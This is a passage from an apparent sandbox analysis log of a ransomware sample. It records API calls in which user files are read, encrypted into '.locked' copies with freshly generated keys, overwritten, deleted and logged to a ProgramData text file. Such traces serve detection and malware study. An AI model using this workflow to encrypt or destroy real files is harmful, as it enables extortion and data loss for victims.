(lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0318.256] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x1265be94 | out: lpMode=0x1265be94) returned 0 [0318.256] WriteFile (in: hFile=0x1b0, lpBuffer=0x1234a2c0*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x1265be64, lpOverlapped=0x0 | out: lpBuffer=0x1234a2c0*, lpNumberOfBytesWritten=0x1265be64*=0x3c, lpOverlapped=0x0) returned 1 [0318.429] SetEvent (hEvent=0x150) returned 1 [0318.429] CloseHandle (hObject=0x1b0) returned 1 [0318.498] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0318.504] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\63hREK4u.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\63hrek4u.avi")) returned 1 [0318.619] SetEvent (hEvent=0x12c) returned 1 [0318.619] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x102 [0318.622] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0318.622] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x102 [0318.626] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0318.626] SetEvent (hEvent=0x22c) returned 1 [0318.626] SetEvent (hEvent=0x134) returned 1 [0318.626] SetEvent (hEvent=0x180) returned 1 [0318.627] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0318.627] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb34, ulCount=0x10, ulNumEntriesRemoved=0x33cefb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb34, ulNumEntriesRemoved=0x33cefb14) returned 0 [0318.628] SetEvent (hEvent=0x150) returned 1 [0318.628] SetEvent (hEvent=0x180) returned 1 [0318.631] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x0 [0318.632] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb30, ulCount=0x10, ulNumEntriesRemoved=0x33cefb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb30, ulNumEntriesRemoved=0x33cefb10) returned 0 [0318.632] SetEvent (hEvent=0x180) returned 1 [0318.653] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\63hREK4u.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\63hrek4u.avi"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0318.691] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0318.781] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x1265de88 | out: lpMode=0x1265de88) returned 0 [0318.781] WriteFile (in: hFile=0x1b0, lpBuffer=0x13788000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x1265de78, lpOverlapped=0x0 | out: lpBuffer=0x13788000*, lpNumberOfBytesWritten=0x1265de78*=0xfa000, lpOverlapped=0x0) returned 1 [0318.804] CloseHandle (hObject=0x1b0) returned 1 [0318.810] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0318.937] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\63hREK4u.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\63hrek4u.avi")) returned 1 [0319.479] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0319.697] SetEvent (hEvent=0x1e8) returned 1 [0319.697] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0319.702] SetEvent (hEvent=0x190) returned 1 [0319.702] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x102 [0319.854] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0319.855] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0x1) returned 0x102 [0319.858] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0319.858] SetEvent (hEvent=0x198) returned 1 [0319.858] SetEvent (hEvent=0x190) returned 1 [0319.858] SetEvent (hEvent=0x220) returned 1 [0319.858] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0319.858] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33cefb34, ulCount=0x10, ulNumEntriesRemoved=0x33cefb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33cefb34, ulNumEntriesRemoved=0x33cefb14) returned 0 [0319.858] SetEvent (hEvent=0x150) returned 1 [0319.858] SetEvent (hEvent=0x220) returned 1 [0319.858] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x1265da24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x1265da24*=0xc) returned 1 [0319.859] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\_wJ5AOb.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\_wj5aob.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x23c [0319.860] GetConsoleMode (in: hConsoleHandle=0x23c, lpMode=0x1265dd9c | out: lpMode=0x1265dd9c) returned 0 [0319.860] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\_wJ5AOb.avi.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\_wj5aob.avi.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0320.123] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x1265dd9c | out: lpMode=0x1265dd9c) returned 0 [0320.123] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390020 | out: pbBuffer=0x12390020) returned 1 [0320.124] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e050 | out: pbBuffer=0x1234e050) returned 1 [0320.124] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702201 | out: pbBuffer=0x12702201) returned 1 [0320.124] WriteFile (in: hFile=0x1f4, lpBuffer=0x12700000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1265dd78, lpOverlapped=0x0 | out: lpBuffer=0x12700000*, lpNumberOfBytesWritten=0x1265dd78*=0x80, lpOverlapped=0x0) returned 1 [0320.158] ReadFile (in: hFile=0x23c, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265dd68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x1265dd68*=0x17d4e, lpOverlapped=0x0) returned 1 [0320.162] WriteFile (in: hFile=0x1f4, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0x17d4e, lpNumberOfBytesWritten=0x1265dd74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x1265dd74*=0x17d4e, lpOverlapped=0x0) returned 1 [0320.173] ReadFile (in: hFile=0x23c, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265dd68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x1265dd68*=0x0, lpOverlapped=0x0) returned 1 [0320.173] CloseHandle (hObject=0x1f4) returned 1 [0320.205] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0320.208] SetEvent (hEvent=0x198) returned 1 [0320.208] CloseHandle (hObject=0x23c) returned 1 [0320.208] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0320.340] SetEvent (hEvent=0x184) returned 1 [0320.340] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) returned 0x0 [0320.363] SetEvent (hEvent=0x1e8) returned 1 [0320.363] WaitForSingleObject (hHandle=0x1f0, dwMilliseconds=0xffffffff) Thread: id = 444 os_tid = 0x1014 [0260.710] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x33e2ff58, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x33e2ff58*=0x1e4) returned 1 [0260.710] SetEvent (hEvent=0x190) returned 1 [0260.710] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x1e8 [0260.710] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0260.715] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0260.718] SetEvent (hEvent=0x134) returned 1 [0260.718] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0260.853] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0260.857] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0261.048] SetEvent (hEvent=0x12c) returned 1 [0261.048] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0261.056] SetEvent (hEvent=0x12c) returned 1 [0261.056] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0261.063] SetEvent (hEvent=0x1dc) returned 1 [0261.063] SetEvent (hEvent=0x184) returned 1 [0261.063] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0262.098] SetEvent (hEvent=0x214) returned 1 [0262.098] SetEvent (hEvent=0x104) returned 1 [0262.098] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0262.171] SetEvent (hEvent=0x214) returned 1 [0262.171] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0262.303] SetEvent (hEvent=0x1f0) returned 1 [0262.303] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0262.441] SetEvent (hEvent=0x21c) returned 1 [0262.441] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0263.014] SetEvent (hEvent=0x184) returned 1 [0263.014] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0263.026] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0263.032] SetEvent (hEvent=0x214) returned 1 [0263.032] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0263.147] SetEvent (hEvent=0x184) returned 1 [0263.147] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0265.435] SetEvent (hEvent=0x214) returned 1 [0265.435] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0265.526] SetEvent (hEvent=0x134) returned 1 [0265.526] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0299.736] SetEvent (hEvent=0x190) returned 1 [0299.736] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0299.742] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0299.746] SetEvent (hEvent=0x190) returned 1 [0299.746] SetEvent (hEvent=0x1ac) returned 1 [0299.746] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0305.620] SetEvent (hEvent=0x12c) returned 1 [0305.620] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0305.636] SetEvent (hEvent=0x20c) returned 1 [0305.636] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0305.711] SetEvent (hEvent=0x14c) returned 1 [0305.711] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0305.796] SetEvent (hEvent=0x12c) returned 1 [0305.796] SetEvent (hEvent=0x1ac) returned 1 [0305.796] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0305.813] SetEvent (hEvent=0x12c) returned 1 [0305.813] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0305.815] SetEvent (hEvent=0x184) returned 1 [0305.815] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0305.827] SetEvent (hEvent=0x134) returned 1 [0305.827] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x102 [0305.856] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0305.856] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x0 [0305.857] SetEvent (hEvent=0x104) returned 1 [0305.858] SetEvent (hEvent=0x214) returned 1 [0305.858] SetEvent (hEvent=0x134) returned 1 [0305.858] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0305.858] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33e2fb34, ulCount=0x10, ulNumEntriesRemoved=0x33e2fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33e2fb34, ulNumEntriesRemoved=0x33e2fb14) returned 0 [0305.858] SetEvent (hEvent=0x104) returned 1 [0305.858] SetEvent (hEvent=0x214) returned 1 [0305.858] SetEvent (hEvent=0x134) returned 1 [0305.897] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\Vi-SNb.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\vi-snb.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0305.901] GetConsoleMode (in: hConsoleHandle=0x1a4, lpMode=0x12623e88 | out: lpMode=0x12623e88) returned 0 [0305.901] WriteFile (in: hFile=0x1a4, lpBuffer=0x14320000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12623e78, lpOverlapped=0x0 | out: lpBuffer=0x14320000*, lpNumberOfBytesWritten=0x12623e78*=0xfa000, lpOverlapped=0x0) returned 1 [0305.930] CloseHandle (hObject=0x1a4) returned 1 [0305.953] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\Vi-SNb.xls" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\vi-snb.xls")) returned 1 [0306.030] SetEvent (hEvent=0x1b8) returned 1 [0306.030] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0306.035] SetEvent (hEvent=0x1ac) returned 1 [0306.035] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0306.059] SetEvent (hEvent=0x1b8) returned 1 [0306.059] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x102 [0306.066] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0306.066] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x0 [0306.067] SetEvent (hEvent=0x1ac) returned 1 [0306.067] SetEvent (hEvent=0x21c) returned 1 [0306.067] SetEvent (hEvent=0x1f0) returned 1 [0306.067] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0306.068] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33e2fb34, ulCount=0x10, ulNumEntriesRemoved=0x33e2fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33e2fb34, ulNumEntriesRemoved=0x33e2fb14) returned 0 [0306.068] SetEvent (hEvent=0x150) returned 1 [0306.068] SetEvent (hEvent=0x1f0) returned 1 [0306.068] SetEvent (hEvent=0x21c) returned 1 [0306.068] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\baXS\\AZLma79E0y7Lx7ST0eS\\vTjM.rtf" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\baxs\\azlma79e0y7lx7st0es\\vtjm.rtf")) returned 1 [0306.233] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0306.382] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0306.390] SetEvent (hEvent=0x22c) returned 1 [0306.390] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x102 [0306.396] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0306.396] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x102 [0306.397] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0306.397] SetEvent (hEvent=0x20c) returned 1 [0306.398] SetEvent (hEvent=0x1ac) returned 1 [0306.398] SetEvent (hEvent=0x22c) returned 1 [0306.398] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0306.398] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33e2fb34, ulCount=0x10, ulNumEntriesRemoved=0x33e2fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33e2fb34, ulNumEntriesRemoved=0x33e2fb14) returned 0 [0306.398] SetEvent (hEvent=0x150) returned 1 [0306.398] SetEvent (hEvent=0x22c) returned 1 [0306.398] SetEvent (hEvent=0x1ac) returned 1 [0306.398] SetEvent (hEvent=0x14c) returned 1 [0306.398] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0306.410] SetEvent (hEvent=0x1dc) returned 1 [0306.410] SetEvent (hEvent=0x134) returned 1 [0306.410] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0306.470] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0306.475] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x12390000*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x12665a24, lpReserved=0x0 | out: lpBuffer=0x12390000*, lpNumberOfCharsWritten=0x12665a24*=0xb) returned 1 [0306.514] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\gCYkDpyT1k8vMjkIl.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\gcykdpyt1k8vmjkil.docx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0306.514] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x12665d9c | out: lpMode=0x12665d9c) returned 0 [0306.515] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\gCYkDpyT1k8vMjkIl.docx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\gcykdpyt1k8vmjkil.docx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0306.515] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x12665d9c | out: lpMode=0x12665d9c) returned 0 [0306.515] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390020 | out: pbBuffer=0x12390020) returned 1 [0306.515] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x124a8020 | out: pbBuffer=0x124a8020) returned 1 [0306.515] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12702401 | out: pbBuffer=0x12702401) returned 1 [0306.515] WriteFile (in: hFile=0x180, lpBuffer=0x1264d000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12665d78, lpOverlapped=0x0 | out: lpBuffer=0x1264d000*, lpNumberOfBytesWritten=0x12665d78*=0x80, lpOverlapped=0x0) returned 1 [0306.520] ReadFile (in: hFile=0x1f4, lpBuffer=0x153d8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12665d68, lpOverlapped=0x0 | out: lpBuffer=0x153d8000*, lpNumberOfBytesRead=0x12665d68*=0x186a2, lpOverlapped=0x0) returned 1 [0306.525] WriteFile (in: hFile=0x180, lpBuffer=0x153d8000*, nNumberOfBytesToWrite=0x186a2, lpNumberOfBytesWritten=0x12665d74, lpOverlapped=0x0 | out: lpBuffer=0x153d8000*, lpNumberOfBytesWritten=0x12665d74*=0x186a2, lpOverlapped=0x0) returned 1 [0306.598] ReadFile (in: hFile=0x1f4, lpBuffer=0x153d8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12665d68, lpOverlapped=0x0 | out: lpBuffer=0x153d8000*, lpNumberOfBytesRead=0x12665d68*=0x0, lpOverlapped=0x0) returned 1 [0306.598] CloseHandle (hObject=0x180) returned 1 [0306.601] CloseHandle (hObject=0x1f4) returned 1 [0306.601] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1f4 [0306.602] GetConsoleMode (in: hConsoleHandle=0x1f4, lpMode=0x12665e94 | out: lpMode=0x12665e94) returned 0 [0306.602] WriteFile (in: hFile=0x1f4, lpBuffer=0x1234a380*, nNumberOfBytesToWrite=0x3c, lpNumberOfBytesWritten=0x12665e64, lpOverlapped=0x0 | out: lpBuffer=0x1234a380*, lpNumberOfBytesWritten=0x12665e64*=0x3c, lpOverlapped=0x0) returned 1 [0306.602] CloseHandle (hObject=0x1f4) returned 1 [0306.603] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\gCYkDpyT1k8vMjkIl.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\gcykdpyt1k8vmjkil.docx")) returned 1 [0306.709] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x0 [0306.741] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33e2fb30, ulCount=0x10, ulNumEntriesRemoved=0x33e2fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33e2fb30, ulNumEntriesRemoved=0x33e2fb10) returned 0 [0306.742] SetEvent (hEvent=0x184) returned 1 [0306.742] SetEvent (hEvent=0x104) returned 1 [0306.742] SetEvent (hEvent=0x220) returned 1 [0306.771] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\gCYkDpyT1k8vMjkIl.docx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\gcykdpyt1k8vmjkil.docx"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x224 [0306.826] GetConsoleMode (in: hConsoleHandle=0x224, lpMode=0x12665e88 | out: lpMode=0x12665e88) returned 0 [0306.826] WriteFile (in: hFile=0x224, lpBuffer=0x1641c000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x12665e78, lpOverlapped=0x0 | out: lpBuffer=0x1641c000*, lpNumberOfBytesWritten=0x12665e78*=0xfa000, lpOverlapped=0x0) returned 1 [0306.847] CloseHandle (hObject=0x224) returned 1 [0306.941] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0306.989] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0306.991] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0307.048] SetEvent (hEvent=0x14c) returned 1 [0307.048] SetEvent (hEvent=0x20c) returned 1 [0307.048] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0307.091] SetEvent (hEvent=0x1f0) returned 1 [0307.091] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0307.360] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0307.368] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1263e020*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x123a3a24, lpReserved=0x0 | out: lpBuffer=0x1263e020*, lpNumberOfCharsWritten=0x123a3a24*=0xb) returned 1 [0307.424] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\rABuPsLDVO2opjc 4TTO.pptx" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\rabupsldvo2opjc 4tto.pptx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0307.424] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x123a3d9c | out: lpMode=0x123a3d9c) returned 0 [0307.424] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Documents\\rABuPsLDVO2opjc 4TTO.pptx.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\documents\\rabupsldvo2opjc 4tto.pptx.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0307.689] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0307.874] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x123a3d9c | out: lpMode=0x123a3d9c) returned 0 [0307.874] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0307.874] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766020 | out: pbBuffer=0x12766020) returned 1 [0307.874] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c081 | out: pbBuffer=0x1237c081) returned 1 [0307.875] WriteFile (in: hFile=0x208, lpBuffer=0x12743000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x123a3d78, lpOverlapped=0x0 | out: lpBuffer=0x12743000*, lpNumberOfBytesWritten=0x123a3d78*=0x80, lpOverlapped=0x0) returned 1 [0307.881] ReadFile (in: hFile=0x1e0, lpBuffer=0x13836000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a3d68, lpOverlapped=0x0 | out: lpBuffer=0x13836000*, lpNumberOfBytesRead=0x123a3d68*=0xa68a, lpOverlapped=0x0) returned 1 [0307.884] WriteFile (in: hFile=0x208, lpBuffer=0x13836000*, nNumberOfBytesToWrite=0xa68a, lpNumberOfBytesWritten=0x123a3d74, lpOverlapped=0x0 | out: lpBuffer=0x13836000*, lpNumberOfBytesWritten=0x123a3d74*=0xa68a, lpOverlapped=0x0) returned 1 [0307.888] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0308.360] ReadFile (in: hFile=0x1e0, lpBuffer=0x13836000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x123a3d68, lpOverlapped=0x0 | out: lpBuffer=0x13836000*, lpNumberOfBytesRead=0x123a3d68*=0x0, lpOverlapped=0x0) returned 1 [0308.362] CloseHandle (hObject=0x208) returned 1 [0308.369] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0308.736] CloseHandle (hObject=0x1e0) returned 1 [0308.736] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0308.737] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x123a3e94 | out: lpMode=0x123a3e94) returned 0 